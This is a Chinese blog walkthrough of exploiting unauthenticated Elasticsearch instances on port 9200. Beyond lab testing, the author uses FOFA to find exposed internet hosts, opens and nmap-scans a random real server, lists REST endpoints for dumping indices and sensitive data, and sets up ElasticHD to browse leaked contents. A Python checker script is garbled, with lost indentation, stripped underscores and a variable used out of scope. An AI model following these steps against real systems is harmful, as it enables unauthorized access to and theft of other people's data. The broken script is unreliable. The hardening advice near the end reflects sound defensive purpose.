Elasticsearch未授权访问漏洞复现

最新推荐文章于 2024-10-22 10:44:39 发布
最新推荐文章于 2024-10-22 10:44:39 发布
阅读量8.7k 收藏 29
点赞数 6
分类专栏: 安全漏洞 文章标签: 安全 安全漏洞 渗透测试 elasticsearch
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HEAVEN569/article/details/114713345
版权

简述

Elasticsearch是一个开源的高扩展的分布式全文搜索引擎,他可以近乎实时的存储、检索数据,本身扩展性很好,可以扩展到上百台服务器,处理PB级别的数据,Elasticsearch也使用Java开发并使用Lucene作为其核心来实现所有索引和搜索的功能,但是它的目的是通过简单的RESTful API来隐藏Lucene的复杂性,从而让全文搜索变得简单。

漏洞原理:Elasticsearch服务普遍存在一个未授权访问的问题,攻击者通常可以请求一个开放9200或9300的服务器进行恶意攻击。

 

一、本地漏洞验证

1.信息收集

nmap -sV 192.168

image.png

2.漏洞复现,

访问地址:http://192.168.20.68:9200/

image.png

 

二、外网探索漏洞

我用FOFA搜索开放了9200端口的IP,获得1,687,803条数据

image.png

 

随便打开一个ip的9200端口,发现存在漏洞

image.png

 

再使用nmap扫描一下ip,发现漏洞确实存在,而且看其他端口的服务,可能存在的漏洞还不少,今天就不探讨其他漏洞了。

image.png

三、信息查看

elasticsearch在安装了river之后可以同步多种数据库数据(包括关系型的mysql、mongodb等)。http://localhost:9200/cat/indices里面的indices包含了river一般就是安装了river了。

http://localhost:9200/rvier/search就可以查看敏感信息了

http://localhost:9200/_plugin/head/ web管理界面

http://localhost:9200/_cat/indices

http://localhost:9200/river/search 查看数据库敏感信息

http://localhost:9200/_nodes 查看节点数据

 

http:// localhost:9200/_cat/indices获取所有的index

image.png

http:// localhost:9200/_mapping?pretty=true 获取index下的所有type

image.png

http:// localhost:9200/pv_fun_all/school/_search?pretty=true 获取该index下该type下的内容

image.png

 

四、漏洞利用

3.1 还可以在kali中搭建ElasticHD,在浏览器中远程连接就可以看到ES节点服务器可视化数据的全貌了

下载地址:

https://github.com/360EntSecGroup-Skylar/ElasticHD/releases/download/1.4/elasticHD_linux_amd64.zip

1.可以下载好了再复制进kali,也可以直接在kali中下载

wget https://github.com/360EntSecGroup-Skylar/ElasticHD/releases/download/1.4/elasticHD_linux_amd64.zip

 

2.解压

unzip elasticHD_linux_amd64.zip

 

3.加权限

chmod 777 ElasticHD

 

4.运行ElasticHD

exec ./ElasticHD -p 127.0.0.1:9801

我运行完命令,终端会自动关闭

 

5.打开浏览器访问http://127.0.0.1:9801/

在浏览器中访问127.0.0.1:9801, 在下面输入需要探索的ip地址,然后点击connect就可以看到泄露的信息,点击模块Query还可以查看详细信息。

image.png

 

3.2  Python未授权访问脚本

#! /usr/bin/env python

*  coding:utf-8 *

import requests

def Elasticsearch_check(ip, port=9200, timeout=5):

try:

  url = "http://"+ip+":"+str(port)+"/_cat"

  response = requests.get(url)

except:

  pass

if "/_cat/master" in response.content:

  print '[+] Elasticsearch Unauthorized: ' +ip+':'+str(port)

if name == 'main':

Elasticsearch_check("127.0.0.1")

 

五、加固方案

1、限制IP访问,绑定固定IP

2、在config/elasticsearch.yml中为9200端口设置认证:

  http.basic.enabled true #开关,开启会接管全部HTTP连接

  http.basic.user "admin" #账号

  http.basic.password "admin_pw" #密码

  http.basic.ipwhitelist ["localhost", "127.0.0.1"]

 

参考链接

https://yq.aliyun.com/articles/616757

https://blog.csdn.net/qq_32393893/article/details/105387471.

https://blog.csdn.net/qq_44108455/article/details/108102982?spm=1001.2101.3001.4242

 

声明:

本文仅限于大家技术交流和学习,严谨读者利用本博客的所有知识点进行非法操作。如果你利用文章中介绍的技术对他人造成损失,后果由您自行承担,感谢您的配合,

作者创作不容易,请大家点赞支持一下。谢谢各位读者大老爷。

HEAVM
关注
专栏目录
web渗透测试漏洞复现Elasticsearch授权漏洞复现
HACKONE的博客
03-18 3065
Elasticsearch 是一款 Java 编写的企业级搜索服务,它以分布式多用户能力和全文搜索引擎为特点,采用 RESTful web 接口。这款搜索引擎由 Java 开发,作为 Apache 许可下的开源软件发布,是流行的企业级搜索引擎之一。Elasticsearch 的增删改查操作都通过 http 接口完成。开源的版本可能存在授权访问漏洞。这意味着攻击者可能获得 Elasticsearch 的所有权限,从而能够对数据进行任意操作。这可能导致业务系统中的敏感数据泄露、数据丢失、数据损坏。
ElasticSearch授权访问漏洞复现
千寻的博客
06-02 4171
漏洞介绍 漏洞原理 Elasticsearch会默认会在9200端口对外开放,用于提供远程管理数据的功能。 任何连接到服务器端口上的人,都可以调用相关API对服务器上的数据进行任意的增删改查。 影响版本 fofa搜索开放了9200端口的IP 环境搭建 第一步 下载文件,保证环境中有jdk1.7+ https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-5.5.0.zip 第二步 解压elasticsearch安装包
大数据-184 Elasticsearch - 原理剖析 - DocValues 机制原理 压缩与禁用
最新发布
永远好奇,无限进步!
10-22 4238
Doc Values 是 Elasticsearch 中的重要功能,旨在提高排序、聚合和过滤的效率。通过列式存储,它允许 Elasticsearch 快速访问相关的字段值,而无需加载整个文档。正确地使用 Doc Values 可以显著提高查询性能,特别是在处理大规模数据时。
常见端口入侵
weixin_44110913的博客
04-15 2258
20:FTP服务的数据传输端口 21:FTP服务的连接端口,可能存在 匿名登陆 弱口令暴力破解 匿名登陆:1.用nc链接21号端口 2.直接使用USER anonymous PASS xxxx 22:SSH服务端口,可能存在 弱口令暴力破解 23:Telnet端口,可能存在 弱口令暴力破解 25:SMTP简单邮件传输协议端口,和 POP3 的110端口对应 43:whois服务端口 53:DNS服...
Elasticsearch 授权访问漏洞复现
一纸荒芜的博客
10-31 7631
Elasticsearch 授权访问漏洞
Elasticsearch授权访问漏洞(Es授权访问)
一直在水些技术小文
03-25 9421
Elasticsearch是一个开源的高扩展的分布式全文检索引擎,它可以近乎实时的存储、检索数据;本身扩展性很好,可以扩展到上百台服务器,处理PB级别的数据。Elasticsearch也使用Java开发并使用Lucene作为其核心来实现所有索引和搜索的功能,但是它的目的是通过简单的RESTful API来隐藏Lucene的复杂性,从而让全文搜索变得简单。 当ElasticSearch的节点启动后,它会利用多播(multicast)(或者单播,如果用户更改了配置)寻找集群中的其它节点,并与之建立连接。这个过程
Elasticsearch授权访问漏洞
12-22 7294
  Elasticsearch服务普遍存在一个授权访问的问题,攻击者通常可以请求一个开放9200或9300的服务器进行恶意攻击。 0x00 Elasticsearch 安装 前提,保证安装了JDK 1.7+ 下载地址:https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-5.5.0.zip (用迅雷打开下载,...
授权访问Elasticsearch 授权访问漏洞
qq_68163788的博客
05-19 3148
ElasticSearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。Elasticsearch是用Java开发的,并作为Apache许可条款下的开放源码发布,是当前流行的企业级搜索引擎。Elasticsearch的增删改查操作全部由http接口完成。由于Elasticsearch授权模块需要付费,所以免费开源的Elasticsearch可能存在授权访问漏洞
Elasticsearch 授权访问漏洞
weixin_53736204的博客
08-04 250
ElasticSearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。Elasticsearch是用Java开发的,并作为Apache许可条款下的开放源码发布,是当前流行的企业级搜索引擎。Elasticsearch的增删改查操作全部由http接口完成。,攻击者可以拥有Elasticsearch的所有权限。可以对数据进行任意操作。业务系统将面临敏感数据泄露、数据丢失、数据遭到破坏甚至遭到攻击者的勒索。
Kibana授权访问漏洞复现、CVE-2019-7609 Kibana远程代码执行漏洞复现
热门推荐
weixin_43061533的博客
12-25 1万+
0x01 漏洞简述 Kibana如果允许外网访问,没有做安全的登录认证,也会被外部随意访问查看所有的数据,造成少数据泄露。在默认配置下,Kibana就可以访问Elasticsearch中的所有数据。 0x02 知识扩展 Kibana是一个开源的分析与可视化平台,设计出来用于和Elasticsearch一起使用的。你可以用kibana搜索、查看存放在Elasticsearch中的数据。Kibana与Elasticsearch的交互方式是各种不同的图表、表格、地图等,直观的展示数据,从而达到高级的数据分析
ElasticSearch漏洞复现
qq_63980959的博客
05-19 3674
Elasticsearch 是一个非常强大的搜索引擎。它目前被广泛地使用于各个 IT 公司。Elasticsearch 是由 Elastic 公司创建。它的代码位于 GitHub - elastic/elasticsearch: Free and Open, Distributed, RESTful Search Engine。Elasticsearch 是一个分布式、免费和开放的搜索和分析引擎,适用于所有类型的数据,包括文本、数字、地理空间、结构化和非结构化数据。
ElasticSearch单机或集群授权访问漏洞
爱辉弟的博客
12-18 4103
ElasticSearch授权访问漏洞,使用系统防火墙来做限制只允许ES集群和Server节点的IP来访问漏洞节点的9200端口,其他的全部拒绝。并在ES节点上设置用户密码
elasticsearch授权访问 验证
qll71的博客
08-12 589
内网渗透测试利用Fscan扫出来elasticsearch授权访问对其进行验证。
Elasticsearch es Mapping
05-26
Elasticsearch Mapping 是指索引(index)中的字段映射(mapping),它定义了文档中每个字段的数据类型和如何存储数据。Mapping 是 Elasticsearch 中非常重要的概念,因为它定义了如何解析和索引文档。 在 Elasticsearch 中,Mapping 分为两种类型:静态 Mapping 和动态 Mapping。 静态 Mapping 是在创建索引时定义的,它指定了所有字段的数据类型和属性。一旦创建了索引,静态 Mapping 就不能再更改。如果想要更改 Mapping,就需要重新创建索引,这会导致数据丢失。 动态 Mapping 是在索引文档时自动创建的,它会根据文档中的字段自动推断数据类型和属性。如果 Elasticsearch 发现一个新的字段,它会自动将其添加到 Mapping 中,并根据字段的数据类型进行设置。 Mapping 有助于优化搜索性能和提高搜索准确性。正确定义 Mapping 可以使 Elasticsearch 更好地理解文档中的数据,从而更好地执行搜索操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值